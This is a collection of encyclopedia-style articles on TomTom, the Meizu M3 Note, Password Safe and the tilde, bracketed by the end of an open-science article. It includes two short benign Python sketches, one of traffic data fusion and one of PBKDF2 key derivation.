like India and China, explicit measures are being taken to combat it. These measures usually involve creating some type of central repository for all available pre-prints, allowing the use of traditional plagiarism-detection algorithms to detect fraud. Nonetheless, this is a pressing issue in the discussion of pre-print servers, and consequently for open science. See also Citizen science GeneLab Journalology Metascience Open data Open science data Open access Open education Open peer review Open research Open source Open government Open Energy Modelling Initiative Open synthetic biology Plan S Science journalism Trial registration References Sources External links a TED talk video by Michael Nielsen on open science https://www.nytimes.com/2012/01/17/science/open-science-challenges-journal-tradition-with-web-collaboration.html?hpw Open access (publishing) Academic publishing Data publishing Metascience
3684349
https://en.wikipedia.org/wiki/TomTom
TomTom
TomTom N.V. is a Dutch multinational developer and creator of location technology and consumer electronics. Founded in 1991 and headquartered in Amsterdam, TomTom released its first generation of satellite navigation devices to market in 2004. The company has over 4,500 employees worldwide and operations in 29 countries throughout Europe, Asia-Pacific, and the Americas. History The company was founded in Amsterdam in 1991 as Palmtop Software, by Corinne Vigreux, Peter-Frans Pauwels and Pieter Geelen. The company focused on corporate handheld device software before focusing on the consumer market and releasing the first route planning software for mobile devices in 1996. Software was developed mainly for Psion devices, and the company was one of the largest developers of Psion software in the late 1990s. Palmtop also worked with Psion in the development of EPOC32. Software was also developed for Palm and Windows CE devices. In 1999, Vigreux's husband, Harold Goddijn, left Psion Netherlands, for which TomTom made software and where Vigreux had previously been sales director, to join TomTom. He had previously invested in TomTom. In 2001, the company's brand name changed to TomTom, while its legal name was also changed by 2003. On 27 May 2005, TomTom listed on the Amsterdam Stock Exchange, valuing the company at nearly €50 million. In September 2005 TomTom acquired Datafactory AG, a telematics service provider based in Leipzig. Datafactory AG employed around 30 people and realized a turnover of approximately €5 million in 2004 and a small net profit. In January 2006, TomTom acquired the UK company Applied Generics, forming TomTom Traffic. In 2008, TomTom acquired Tele Atlas, a digital map maker, for €2.9 billion. In 2010, they produced an advert saying "You are not stuck in traffic. You are traffic." A photograph of this was widely circulated on the internet. It became a meme, often with different images and sometimes reworded slightly. On 11 June 2012, at an event for Apple's iOS 6 preview, TomTom was announced as the main mapping data provider for Apple's revamped iOS 6 "Maps" app, replacing Google Maps. In 2014, TomTom partnered with Volkswagen Group for joint research on Highly Automated Driving (HAD) systems. TomTom signed deals to provide its navigation devices to several carmakers including Volkswagen Group, Daimler, Toyota and others. In late 2015, TomTom extended its deal with Apple and signed a new contract with Uber, in which the Uber driver app uses TomTom maps and traffic data in 300 cities worldwide. In May 2018, TomTom launched a new portable navigation device, the TomTom Go Camper, to cater for the requirements of caravan and motorhome users. In January 2018 the company faced criticism for announcing that it would no longer be providing map updates for some devices. It also said that "lifetime" meant the "useful life" of a device. In 2020 the company signed a deal with the Chinese company Huawei to provide maps for Huawei's smartphones, replacing Google Maps. Product history Until 1996, TomTom developed business-to-business applications such as meter reading and bar-code reading for handheld devices, such as the Palm Pilot, Compaq iPaq and Psion Series 5. Subsequently, the company moved its focus to PDA software for the consumer market. Early mapping software included EnRoute, Citymaps and Routeplanner. By 2001, they released the first car satellite navigation software, the TomTom Navigator, shifting the company's focus to GPS car navigation. 
In 2004 a built-in subscription-based traffic update service was added. The first all-in-one personal navigation device, the TomTom Go, was released in March 2004, creating a new consumer electronics category. TomTom reports it sold about 250,000 units of the TomTom Go, and this product represented 60% of the company's revenue for 2004. The company has since sold nearly 80 million navigation devices worldwide. In 2005, the ability to download new voices was introduced. The ruggedized, water-resistant Rider navigation device was released for motorcycle users in 2006. The Rider was the first portable satellite navigation device designed for motorcycles and scooters. Text-to-speech for road names was first introduced in 2006, along with hands-free calling and traffic support. TomTom Home, software for managing and downloading content for TomTom on a PC, was first released at this time. TomTom partnered with Vodafone in 2007 to create a high definition traffic service, designed to deliver real-time traffic data to Vodafone users through their devices. New features introduced in 2008 included IQ Routes, which estimated journey times based on average recorded speeds, rather than speed limits, and "Advanced Lane Guidance", an on-screen representation of the correct lane to take. In the autumn of 2008 devices were introduced with built-in GSM SIM cards, for connected features including HD Traffic, Google Local Search, real-time speed camera updates, and the facility to search for the cheapest fuel en route. In 2013 TomTom entered the GPS sports watch market with the launch of the TomTom Runner and TomTom Multi-Sport GPS. TomTom extended its range of GPS sports watches with the 2014 launch of the Runner Cardio GPS, which had a built-in heart rate monitor. In 2015, TomTom entered a new product category with the launch of its new action camera, the Bandit. It had a built-in media server, enabling users to share footage in a matter of minutes. TomTom launched a new sports watch in 2016, the TomTom Spark, which, in addition to GPS and a heart-rate monitor, included music on the wrist and a 24/7 activity tracker. In 2018, TomTom became the primary supplier of data for Apple's map app. TomTom Group business structure TomTom's business model targets two major market segments: location technology and consumer. Location Technology Location technology comprises the company's automotive and enterprise businesses, providing maps and navigation software as components of customer applications. The firm's automotive segment sells location technology components to carmakers. TomTom's navigation software is integrated into vehicles to provide current map data, online routing, and guidance and search information, allowing for vehicle features like destination prediction, traffic expectations, or charging point location and availability for electric vehicles. TomTom's enterprise segment sells its location technologies to tech companies, government bodies, and traffic management entities. Consumer The consumer segment of TomTom's business sells portable, personal satellite navigation devices, once its core profit center. Usage of standalone GPS devices has since declined, despite the brand's efforts to differentiate its features from those of smartphone-integrated alternatives. Recently, the company has transitioned its consumer business away from devices to offer software applications with digital map-linked services instead. 
This shift in focus is due partially to declining profitability as consumers utilize GPS alternatives with integrated navigation apps, and also to the anticipated rise in autonomous vehicle usage. Products and services TomTom offers three types of products in various forms: maps, connected services and (navigation) software. TomTom navigation devices (PNDs) and TomTom GO navigation apps are sold directly or indirectly to end-consumers. In-dashboard systems are released for the automotive market. The navigation devices and portable devices with installed software are referred to as units. TomTom partners with several car manufacturers and offers built-in navigation devices. Navigation TomTom units provide a "flying" interface with an oblique bird's-eye view of the road, as well as a direct-overhead map view. They use a GPS receiver to show the device's precise location and provide visual and spoken directions on how to drive to the specified destination. Some TomTom systems also integrate with mobile phones over Bluetooth, either to receive traffic congestion information or to take calls and read SMS messages aloud. Navigation devices TomTom's all-in-one GPS navigation devices come with a touch screen, speaker, USB port, and internal lithium-ion battery. Most models have Bluetooth transceivers that allow connection to a smartphone, allowing the device to be used as a speakerphone to make and receive hands-free calls. TomTom Go, Via and Start – general purpose navigation devices. TomTom Camper & Caravan / RV – these models have a map that is supplied with height and width restrictions, which allows vehicle size and weight data to be entered for route planning. TomTom Truck – designed for professional truck drivers and including truck-specific software and maps. TomTom Rider – portable water-resistant models for motorcycle and motorscooter users. They differ from other devices in that the Rider is partly shielded and has a 'glove-friendly' screen and GUI. TomTom One and One XL – The TomTom One is the base model for automobile navigation. The difference between the TomTom One XL and the TomTom One is the size of the touch screen (4.3 vs 3.5 in or 110 vs 89 mm). Neither model of the One contains the added functions included in the Go models, such as Bluetooth hands-free calling and MP3 Jukebox. However, the One is able to receive traffic and weather updates using the TomTom Plus service when paired via Bluetooth with a mobile phone with a DUN data service. The reduced software capability means less demand on the hardware, which allows the One to be sold at a significantly lower price than the Go. The XL is also available as a Live version with integrated Live Services. Navigation software TomTom Navigator – a GPS navigation software product for personal digital assistants (PDAs), Palm devices, Pocket PCs, and some smartphones. TomTom Navigator 6 replaced the earlier TomTom Mobile 5.2. It can use GPS receivers built into the device or external (e.g., Bluetooth-connected) receivers. Navigator 7, the latest release of this software, shipped as part of the software bundled with the June 2008 HTC Touch Diamond. Frequently used functions can be added to the main screen of the program, and users can report map corrections and share them with other users. Navigator supports touch screens; devices without touch screens use a cursor to input data. The software is available on SD card and DVD. 
It runs on a number of devices listed on the TomTom website, but will run successfully on many unlisted devices using the Windows Mobile operating system, discontinued in 2010. The DVD version includes a DVD, a printed 15-character product code, a Quick Start Guide, a Licensing Agreement, a poster with a picture diagram of the setup procedure for the DVD and SD card versions, and an advertisement for associated TomTom Plus services. The DVD contains installation software for TomTom Home, software for mobile devices, licenses, manuals, maps, and voices. The software for mobile devices includes CAB files for Palm, PPC, Symbian, and UIQ3. TomTom for iOS – GPS navigation software product for iOS devices, originally announced for the iPhone at the Apple WWDC Keynote speech in early June 2009, and released internationally on 15 August 2009 in the Apple App Store, with various map packs for different regions. TomTom's Vice President of Marketing Development gave details in an interview with Macworld in July 2009. Currently the app works with the iPhone, iPod Touch and iPad (all models); however, Apple has dropped support for early models, and the latest versions of the TomTom iOS app might have issues on certain devices. There are two separate TomTom car kits available for certain Apple devices. The maps currently available in each country's App Store vary according to the language availability of the app itself and the country of the App Store; thus, different regional map packs are available. Turkey and Greece were not included in the larger Europe map pack; this is related to the App Store's app size limitation of 2 GB. These maps are available separately. Iceland is not currently available in any map package sold by TomTom, although the company is working on it (along with a few other countries). A new iOS app based on NavKit is also likely, which might resolve the size-limit issue (Apple has since increased the app size limit to 4 GB). TomTom Go Mobile, GPS navigation software for the Android operating system. It replaced the old app, which had similar features to the iOS app. In March 2015, TomTom announced the new TomTom Go Mobile app for Android with a freemium subscription model for maps, with the first 50 miles/75 kilometres per month free, including all available maps, TomTom Traffic and Speed Cameras. The previous app, which had promised "free lifetime updates", is no longer available for purchase on the Play Store, and its maps have not been updated since October 2015. TomTom claims its definition of lifetime map updates is "the period of time that TomTom continues to support the app with updates". Previous customers of TomTom's Android navigation app are offered a discount on the subscription in the new app for three years. There is no provision for users who want to keep using the old app under the conditions under which it was sold, namely with lifetime map updates. TomTom Speed Cameras, a mobile software application released in 2015 free of charge. Navigation software for several mobile phones was discontinued after release 5.2; Navigator, which does not support all the phones that Mobile did, is the nearest equivalent. Mobile 5.2 cannot use maps later than v6.60 build 1223; this and earlier program versions are not compatible with all map versions, particularly other builds of version 6. In September 2012, Apple collaborated with TomTom to provide mapping data for its revamped Apple Maps app in iOS 6. 
The partnership was in part due to Apple's decision to wean itself off the products of its competitor, Google. As of 2018 TomTom continues to provide data for Apple Maps. Support Applications TomTom Home (stylized as TomTom HOME) is a 32-bit PC application that allows synchronization/updates to be sent to the mobile device. TomTom Home version 2.0 and above is implemented on the XULRunner platform. With version 2.2, TomTom Home added a content-sharing platform where users can download and upload content to personalize their devices, such as voices, start-up images, POI sets, etc. TomTom Home is currently at version 2.9. Despite being based on the cross-platform XULRunner, TomTom Home lacks support for Linux. It is, for instance, impossible to update the maps in these devices by connecting them to another machine running Linux, even when using a common web browser like Firefox that normally allows such an update under Microsoft Windows. However, the devices can still be read in a Linux OS as a disk drive. There is even community-made software to manage some functions of TomTom devices. The NAV3 and NAV4 ranges of models use MyDrive Connect. MyDrive Connect is compatible with 32-bit and 64-bit versions of Windows XP/Vista/7/8/8.1/10 preview and with most Mac OS X versions. The internal flash memory or the memory card content of the device cannot be accessed through USB for security reasons (modified applications would easily accept a map that wasn't sold by TomTom). The device can update itself by getting files through the HTTP protocol over USB. The support app is nothing more than a proxy on the PC buffering the download. So far, the security achieved using this mechanism has not been broken. The use of a non-FAT/FAT32 file system also brought stability improvements to device operation. Traffic services TomTom Traffic is a traffic monitoring service that uses multiple sources to provide traffic information. The service does this by combining data from traditional sources (governmental and third-party data such as induction loops in the roads, cameras and traffic surveillance) with data from new sources (the traffic flow of millions of anonymous mobile phone users). The information is merged by TomTom, and algorithms are used to improve the data and filter out anomalous readings (a minimal illustrative sketch of this kind of data fusion appears below). The system sends updates to all TomTom Traffic users every two minutes (and the data the users receive is never older than 30 seconds). Users can receive the service through the built-in SIM, via a smartphone connection or, on older devices, via a standard phone connection. Re-routing can be set to be transparent to the user, with the only signs that the route has been changed due to a traffic jam being a sound indication from the device and a changed estimated time of arrival (ETA). The system was first launched in the Netherlands in 2007 and expanded to the United Kingdom, France, Germany and Switzerland in 2008. By mid-2011, TomTom Live services including TomTom Traffic were available in the United States, South Africa, New Zealand and seventeen European countries: Austria, Belgium, Denmark, Finland, France, Germany, Ireland, Italy, Luxembourg, Netherlands, Norway, Poland, Portugal, Spain, Sweden, Switzerland and the United Kingdom. The service has since been vastly expanded, and current coverage is listed on the TomTom Traffic site (34 countries, with new regions added every few months). 
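The exact fusion pipeline described above is proprietary and not documented in detail here. As a rough, hypothetical sketch only, assuming per-segment speed readings from loop detectors, cameras, and anonymous phone probes, the following shows how several readings could be merged and obviously anomalous values filtered out before averaging; the function name, the tolerance value, and the data layout are invented for illustration and are not TomTom's actual algorithm.

```python
from statistics import median

def fuse_segment_speeds(readings, tolerance=0.5):
    """Hypothetical fusion of speed readings (km/h) for one road segment.

    `readings` is a list of (source, speed_kmh) tuples from induction loops,
    cameras, and anonymous phone probes. A reading is treated as anomalous and
    discarded if it deviates from the median by more than `tolerance` (50% by
    default); the remaining readings are averaged.
    """
    speeds = [speed for _, speed in readings if speed > 0]
    if not speeds:
        return None  # no usable data for this segment
    mid = median(speeds)
    kept = [s for s in speeds if abs(s - mid) <= tolerance * mid]
    return sum(kept) / len(kept)

# Example: one loop detector, one camera estimate, and two phone probes;
# the implausibly fast probe reading is dropped before averaging.
print(fuse_segment_speeds([("loop", 42.0), ("camera", 45.0),
                           ("probe", 40.0), ("probe", 110.0)]))
```

A real system would of course weight sources by reliability and aggregate over time windows; the sketch only illustrates the merge-and-filter idea stated in the text.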
HD Traffic 6.0 (August 2012): More accurate location of traffic jams, improved coverage of automatically detected road closures TomTom Traffic 7.0 (September 2013): Increased accuracy of jam location now allows for 'Jam Ahead Warnings', warning drivers when approaching a jam-tail too fast. Coverage of automatic road closure detection was improved to also include major secondary roads. Automatic road works detection on highways. TomTom also added a 'Predictive Flow Feed' to better predict approaching traffic delays, with the goal of improving optimal route calculation and ETAs. TomTom Traffic 8.0 (November 2014): TomTom included real-time weather information in its routing algorithms and warns users in areas of bad weather. Version 8.0 also incorporates road closures reported via the online Map Share Reporter tool into its real-time traffic information. Consumer The company offers fee-based services under the name TomTom Plus (stylized TomTom PLUS), which include services to warn drivers about speed cameras, provide weather updates, change voices and provide traffic alerts. Currently, these fees apply only to European countries. Traffic data is also available to subscribers in many parts of Europe and the US via a Bluetooth-enabled cell phone with Internet service or via an add-on aerial, which picks up RDS data (broadcast on FM radio frequencies), offering traffic information without requiring a data connection. The TomTom Plus service is not compatible with Apple's iPhone. In October 2008 the company released Live Services on the Go 940 Live. These allowed users to receive updates over the mobile telephone network using the SIM card in the device. These services included HD Traffic, Safety Alerts, Local Search with Google and Fuel Prices. On 12 May 2011, TomTom announced that it was offering up its real-time traffic products to "industry partners" in the United States. On the latest NAV4 devices the service is no longer available in its old form; the included services have been separated and are now called TomTom Traffic and Speed Cameras. On the x0/x00/x000 devices the traffic service is free of charge either via the built-in SIM (Always Connected models) or via a compatible smartphone (smartphone-connected or BYOD – bring-your-own-device). The speed camera service is free for three months on these models. However, the newer x10/x100 range now comes with a free lifetime speed camera subscription as well. Map Share is a proprietary map technology launched by TomTom in June 2007. Map Share allows drivers to make changes to the maps directly on their navigation devices and share them with other users. Drivers can block or unblock streets, change the direction of traffic, edit street names and add, edit or remove points of interest (POIs). Improvements can be shared with other users through TomTom Home, TomTom's content management software. An online version, called Map Share Reporter, is available on the TomTom website. IQ Routes, developed by TomTom and available since spring 2008 on the TomTom Go 730 and Go 930, uses anonymous travel time data accumulated by users of TomTom satnav devices. Newer TomTom devices use this data to take into account the time and day when determining the fastest route. Travel time data is stored in Historical Speed Profiles, one for each road segment, covering large motorways, main roads and small local roads. 
Historical Speed Profiles are part of the digital map and are updated with every new map release. They give insight into real-world traffic patterns. This makes IQ Routes a fact-based routing system built on measured travel times, in contrast to most other methods, which use speed limits or 'assumed' speeds. In September 2008, map upgrade v8.10 was released for x20 series models, extending the IQ Routes feature to those devices with a free software update using TomTom Home. On the NAV3 and NAV4 models the IQ Routes feature is available by default on all map versions. Mapping TomTom worked with auto parts manufacturer Bosch, starting in 2015, to develop maps for use in self-driving vehicles. Bosch defined the specifications for TomTom's maps to follow as the companies began their first road tests on U.S. highway I-280 and Germany's A81. TomTom commented at the time on the contrast in the detail required in those newly developed maps compared with earlier versions, specifically including "precision to the decimeter" and other complex data required to help a self-driving car "see" key road features as it travels. In 2015, TomTom was one of the few independent producers of digital maps remaining in the marketplace, partnering with brands such as Volkswagen to provide maps to the auto industry. The company also partnered with Uber in 2015, and extended the partnership further in 2020. Together the companies have worked to integrate TomTom maps and traffic data across the ridesharing app's platform. This lets Uber serve as a "trusted map editing partner", making it one of the first brands to join TomTom's Map Editing Partnership (MEP) program. As part of the MEP program, users provide feedback on road conditions as they encounter them so that live maps can be updated to reflect current conditions. The program's partners make an estimated 3 million edits globally each month. Apple has relied on licensed data from TomTom and others to fill in data gaps in its Maps app since launching it in 2012. In January 2020, following a recent app update, Apple confirmed that it was no longer licensing data from TomTom and would rely on its own underlying Maps framework going forward. As of 2019, TomTom claimed to have 800 million people using its products across physical hardware and apps using TomTom technology. The same year, TomTom sold its telematics division, TomTom Telematics, to Japan's Bridgestone to prioritize business linked to its digital maps, as the brand shifted focus from consumer devices to software services. In 2019, TomTom Telematics became Webfleet Solutions. In 2019 the brand leveraged its real-time driving and parking data in collaborations with Microsoft and Moovit (a public transport data platform), and struck map and navigation deals with major car makers including Nissan, Fiat Chrysler, Porsche, Lamborghini and Bentley, among others. Teaming up with the University of Amsterdam, TomTom launched Atlas Lab, a research lab dedicated to AI development in support of HD maps for use in autonomous vehicles. TomTom has also been developing High Definition (HD) maps intended for use in autonomous cars to assist with environmental data where sensors are limited. In March 2019 the company announced that it would supply HD maps, with centimeter accuracy in representing terrain, to "multiple top 10" auto manufacturers, and announced a new "map horizon" feature, allowing self-driving cars to build a virtual picture of the road ahead in real time. 
The company partnered with Volvo the same year (2019) to build its own vehicle capable of "level 5" autonomy in hopes of further improving its maps technology. The Volvo XC90 included custom sensing equipment to provide data about the vehicle's surroundings that could be referenced against TomTom's HD maps. TomTom crowdsourced camera data through its partnership with Hella Aglaia, announced in September 2019, to feed into its real-time map updates for ongoing improvement to the new HD maps technology. In early 2020, TomTom publicly announced the recent closing of a deal with Huawei Technologies where Huawei would use TomTom's maps, data, and navigation tools to develop its own apps for use in Chinese smartphones. TomTom has collected a range of live and historical data since 2008, analysing data from a variety of sources including connected devices and its community of users. Additionally, TomTom's "MoMa" vehicles (short for mobile mapping) cover over 3 billion km annually, using both radar and LiDAR cameras to capture 375 million images annually to sense road changes that are then verified and used to update its maps. TomTom pairs this data with input from partnering brands to process around 2 billion map changes on average each month to keep maps current and reflective of existing road conditions. The brand puts out an updated map database commercially on a weekly basis. Controversy In April 2011, TomTom "apologized for supplying driving data collected from customers to police to use in catching speeding motorists". The company had collected data from its Dutch customers which Dutch police subsequently used to set targeted speed traps. As a result of this, TomTom was investigated by the Dutch Data Protection Authority, who found that TomTom had not contravened the . In 2011, TomTom improved the clarity of its explanation of how it uses the data it collects from its customers. In May 2011, the company announced that it was planning to sell aggregated customer information to the Roads & Traffic Authority of the Australian state of New South Wales, which could also potentially be used for targeted speed enforcement. The privacy implications of this announcement were widely reported, particularly the lack of anonymity and the potential to associate the data with individuals. The company's practice of selling its user data has been criticised by Electronic Frontiers Australia. David Vaile of the University of New South Wales' Cyberspace Law and Policy Centre has called for an independent technical analysis of the company's data collection practices. TomTom navigation devices collect user data that includes point of origin, point of destination, journey times, speeds and routes taken. The Australian Privacy Foundation said it would be easy to trace the data back to individual customers, even if TomTom claimed it used only aggregated, anonymous data. TomTom VP of Marketing Chris Kearney insisted the information was totally anonymous. In addition to this, he said TomTom never sold the information to Dutch authorities with speed cameras in mind, although Kearney would not rule out selling the user data for similar use in Australia. Such data is being purchased from various mapping companies by governments on a fairly regular basis. It is not known if governments use this data for purposes other than the placement of speed cameras, such as to improve the road network, introduce traffic lights or find accident hotspots. 
Competition TomTom's main retail car satellite navigation competitors are MiTAC (Navman and Magellan Navigation) and Garmin. TomTom's main autonomous driving HD maps competitor is Here, which is owned by a consortium of German automotive companies including Audi, BMW, and Daimler. See also Comparison of commercial GPS software References External links TomTom Open-Source Manufacturing companies based in Amsterdam Electronics companies of the Netherlands Satellite navigation Electronics companies established in 1991 Dutch brands Multinational companies headquartered in the Netherlands Navigation system companies Self-driving cars Automotive navigation systems
51364576
https://en.wikipedia.org/wiki/Meizu%20M3%20Note
Meizu M3 Note
The Meizu M3 Note is a smartphone designed and produced by the Chinese manufacturer Meizu, which runs on Flyme OS, Meizu's modified Android operating system. It is a phablet model of the M series, succeeding the Meizu M2 Note. It was unveiled on April 6, 2016 in Beijing. History Initial rumors appeared in March 2016 after a possible specification sheet had been leaked, stating that the upcoming device would most likely feature a MediaTek Helio P10 system on a chip, a Full HD display and a 4100 mAh battery. On March 22, Meizu founder Jack Wong mentioned that the M3 Note was about to launch soon. The following day, Meizu confirmed that the launch event for the Meizu M3 Note would take place in Beijing on April 6, 2016. The new device was later sighted on the AnTuTu benchmark, confirming the speculation that it would be powered by a MediaTek Helio P10 SoC. On April 4, 2016, Meizu released a teaser for the product launch, confirming that the upcoming device would feature an all-metal body. Release As announced, the M3 Note was released in Beijing on April 6, 2016. Pre-orders for the M3 Note began after the launch event on April 6, 2016. Sales began on April 30, 2016 in mainland China and on May 11, 2016 in India. Features Flyme The Meizu M3 Note was released with an updated version of Flyme OS, a modified operating system based on Android Lollipop. It features an alternative, flat design and improved one-handed usability. Hardware and design The Meizu M3 Note features a MediaTek Helio P10 system-on-a-chip with an array of eight ARM Cortex-A53 CPU cores, an ARM Mali-T860 MP2 GPU and 2 GB or 3 GB of RAM. The M3 Note reaches a score of 50,000 points on the AnTuTu benchmark and is therefore approximately 56% faster than its predecessor, the Meizu M2 Note. The M3 Note is available in three different colors (grey, silver and champagne gold) and comes with either 2 GB of RAM and 16 GB of internal storage or 3 GB of RAM and 32 GB of internal storage. Unlike its predecessor, the Meizu M3 Note has a full-metal body, which measures x x and weighs . It has a slate form factor, being rectangular with rounded corners, and has only one central physical button at the front. Unlike most other Android smartphones, the M3 Note has neither capacitive buttons nor on-screen buttons. The functionality of these keys is implemented using a technology called mBack, which makes use of gestures with the physical button. The M3 Note further extends this button with a fingerprint sensor called mTouch. The M3 Note features a fully laminated 5.5-inch LTPS multi-touch capacitive touchscreen display with an FHD resolution of 1080 by 1920 pixels. The pixel density of the display is 403 ppi. In addition to the touchscreen input and the front key, the device has volume/zoom control buttons and the power/lock button on the right side, a 3.5mm TRS audio jack on the top and a microUSB (Micro-B type) port on the bottom for charging and connectivity. The Meizu M3 Note has two cameras. The rear camera has a resolution of 13 MP, a ƒ/2.2 aperture, a 5-element lens, phase-detection autofocus and an LED flash. The front camera has a resolution of 5 MP, a ƒ/2.0 aperture and a 5-element lens. Reception The M3 Note received generally positive reviews. Android Authority gave the M3 Note a rating of 8.2 out of 10 possible points and concluded that “the Meizu M3 Note packs a very large punch for its price”. The build quality, battery life and the good display were also praised. 
Huffington Post stated that the Meizu M3 Note is “[an] affordable and highly functional Android smartphone, with a large HD screen, great design and impressive battery life”. Android Headlines also reviewed the device and concluded that “[the] overall fantastic performance and just a great experience in general make the Meizu M3 Note an easy recommendation for sure”. TechSpot gave the M3 Note a rating of 7.5 out of 10 possible points and noted that “the M3 Note could be a great budget smartphone purchase”. See also Meizu Meizu M2 Note Comparison of smartphones References External links Official product page Meizu Android (operating system) devices Mobile phones introduced in 2016 Meizu smartphones Discontinued smartphones
1846387
https://en.wikipedia.org/wiki/Password%20Safe
Password Safe
Password Safe is a free and open-source password manager program originally written for Microsoft Windows but now supporting a wide range of operating systems, with compatible clients available for Linux, FreeBSD, Android, iOS, BlackBerry and other operating systems as well. The Linux version is available for Ubuntu (including the Kubuntu and Xubuntu derivatives) and Debian. A Java-based version is also available on SourceForge. On its project page, users can find links to unofficial releases running under Android, BlackBerry, and other mobile operating systems. History The program was initiated by Bruce Schneier at Counterpane Systems, and is now hosted on SourceForge (Windows) and GitHub (Linux) and developed by a group of volunteers. Design After entering the master password, the user has access to all account data entered and saved previously. The data can be organized by categories, searched, and sorted based on references which are easy for the user to remember. There are various key combinations and mouse clicks to copy parts of the stored data (password, email, username etc.), or to use the autofill feature (for filling forms). The program can be set to minimize automatically after a period of idle time and to clear the clipboard. It is possible to compare and synchronize (merge) two different password databases. The program can be set up to generate automatic backups. Password Safe does not support database sharing, but the single-file database can be shared by any external sharing method (for example Syncthing, Dropbox etc.). The database is not stored online. Features Note: All uncited information in this section is sourced from the official Help file included with the application. Password management Stored passwords can be sectioned into groups and subgroups in a tree structure. Changes to entries can be tracked, including a history of previous passwords, the creation time, modification time, last access time, and expiration time of each password stored. Text notes can be entered with the password details. Import and export The password list can be exported to various file formats including TXT, XML and previous versions of Password Safe. Password Safe also supports importing these files. Password Safe supports importing TXT and CSV files which were exported from KeePass version 1.x (V1). KeePass version 2.x (V2) allows databases to be exported as a KeePass V1 database, which in turn can be imported to Password Safe. Password Safe cannot directly import an XML file exported by KeePass V1 or V2, as the fields are too different. However, the Help file provides instructions for processing an exported XML file with one of multiple XSLT files (included with Password Safe) which will produce a Password Safe compatible XML file that can then be imported. File encryption Password Safe can encrypt any file using a key derived from a passphrase provided by the user through the command-line interface. Password generator The software features a built-in password generator that generates random passwords. The user may also designate parameters for password generation (length, character set, etc.), creating a "Named Password Policy" by which different passwords can be created. Cryptography The original Password Safe was built on Bruce Schneier's Blowfish encryption algorithm. Rony Shapiro implemented Twofish encryption along with other improvements to the 3.xx series of Password Safe. The keys are derived using an equivalent of PBKDF2 with SHA-256 and a configurable number of iterations, currently set at 2048. 
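The key-stretching step described above can be sketched with Python's standard library. This is a minimal illustration of PBKDF2-HMAC-SHA-256 with 2048 iterations, not a reimplementation of Password Safe's exact V3 key-derivation routine; the passphrase and salt handling are simplified for the example.

    import hashlib
    import os

    def derive_key(master_password: str, salt: bytes, iterations: int = 2048) -> bytes:
        # Stretch the master passphrase into a 256-bit key; the iteration
        # count makes brute-force guessing proportionally more expensive.
        return hashlib.pbkdf2_hmac("sha256", master_password.encode("utf-8"),
                                   salt, iterations)

    salt = os.urandom(32)                 # stored alongside the database
    key = derive_key("correct horse battery staple", salt)
    print(len(key))                       # 32 bytes (256 bits)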
In a paper analysing the database formats of various password storage programs for security vulnerabilities, researchers found that the format used by Password Safe (the version 3 format) was the most resistant to various cryptographic attacks. Reception Reviewers have highlighted the program's simplicity as its best feature. See also List of password managers Password manager References External links Password Safe at FileHare.com Password Safe at Schneier.com pwSafe Password Safe clone for OS X and iOS Password Safe at Softonline.net Cryptographic software PIM-software for Windows Linux software Java platform software Free password managers Portable software Software that uses wxWidgets 2002 software Free software programmed in C++ Freeware Free and open-source Android software
212390
https://en.wikipedia.org/wiki/Tilde
Tilde
The tilde (), or , is a grapheme with several uses. The name of the character came into English from Spanish and Portuguese, which in turn came from the Latin titulus, meaning "title" or "superscription". Its primary use is as a diacritic (accent) in combination with a base letter but, for historical reasons, it also is used in standalone form in a variety of contexts. History Use by medieval scribes The tilde was originally written over an omitted letter or several letters as a scribal abbreviation, or "mark of suspension" and "mark of contraction", shown as a straight line when used with capitals. Thus, the commonly used words Anno Domini were frequently abbreviated to Ao Dñi, with an elevated terminal with a suspension mark placed over the "n". Such a mark could denote the omission of one letter or several letters. This saved on the expense of the scribe's labour and the cost of vellum and ink. Medieval European charters written in Latin are largely made up of such abbreviated words with suspension marks and other abbreviations; only uncommon words were given in full. The text of the Domesday Book of 1086, relating for example, to the manor of Molland in Devon (see adjacent picture), is highly abbreviated as indicated by numerous tildes. The text with abbreviations expanded is as follows: Role of mechanical typewriters The incorporation of the tilde into ASCII is a direct result of its appearance as a distinct character on Portuguese mechanical typewriters in the late nineteenth century. This symbol did not exist independently as a type or hot-lead printing character. On typewriters designed for languages that routinely use diacritics (accent marks), a dead key mechanism was provided: a mark is made when a dead key is typed but, unlike normal keys, the paper carriage does not move on. To achieve an accented letter, the typist first typed the desired diacritic, then typed the letter to be accented. Since the diacritic key a 'dead key' had not moved the paper on, the letter was printed under the previously-printed accent. To add a diacritic to a capital letter on some typewriters, the upper-case [elevated] version of the accent could be produced using plus the diacritic key. On others, however, the typebar had two different diacritics so that users could only add accents to lower-case letters without manual intervention or other adjustment. For most Western European languages, the only diacritics used are acute (), grave (, circumflex () and diaeresis (or umlaut, ): early typewriters for the European market included these as dead keys. Spanish and Portuguese uniquely use the tilde diacritic. In modern Spanish, the tilde accent is needed only for the characters and . Both were precomposed as distinct graphemes and assigned to a single typebar, which sacrificed a key that was felt to be less important, usually the key. Portuguese, however, has two: and . Whereas it was just about possible to find one low-use key to sacrifice for Spanish, to find two sacrificial keys for Portuguese was impractical. Instead a single key was changed to a tilde dead key and was born as a distinct grapheme. The centralized ASCII tilde ASCII incorporated many of the overprinting lower-case diacritics from typewriters, including tilde. Overprinting was intended to work by putting a backspace code between the codes for letter and diacritic. 
However, even at that time, mechanisms that could do this or any other overprinting were not widely available, did not work for capital letters, and were impossible on video displays, with the result that this concept failed to gain significant acceptance. Consequently, many of these diacritics (and the underscore) were quickly reused by software as additional syntax, basically becoming new types of syntactic symbols that a programming language could use. As this usage became predominant, type design gradually evolved so these diacritic characters became larger and more vertically centered, making them useless as overprinted diacritics but much easier to read as free-standing characters that had come to be used for entirely different and novel purposes. Typography and lexicography A similarly shaped mark, called the swung dash, is used in dictionaries to indicate the omission of the entry word. Connection to Spanish As indicated by the etymological origin of the word "tilde" in English, this symbol has been closely associated with the Spanish language. The connection stems from the use of the tilde above the letter to form the (different) letter in Spanish, a feature shared by only a few other languages, most of which are historically connected to Spanish. This peculiarity can help non-native speakers quickly identify a text as being written in Spanish with little chance of error. In addition, most native speakers, although not all, use the word to refer to their language. Particularly during the 1990s, Spanish-speaking intellectuals and news outlets demonstrated support for the language and the culture by defending this letter against globalisation and computerisation trends that threatened to remove it from keyboards and other standardised products and codes. The Instituto Cervantes, founded by Spain's government to promote the Spanish language internationally, chose as its logo a highly stylised with a large tilde. The 24-hour news channel CNN in the US later adopted a similar strategy on its existing logo for the launch of its Spanish-language version, and similarly to the National Basketball Association (NBA), the Spain men's national basketball team is nicknamed "ÑBA". In Spanish itself the word is used more generally for diacritics, including the stress-marking acute accent. The diacritic is more commonly 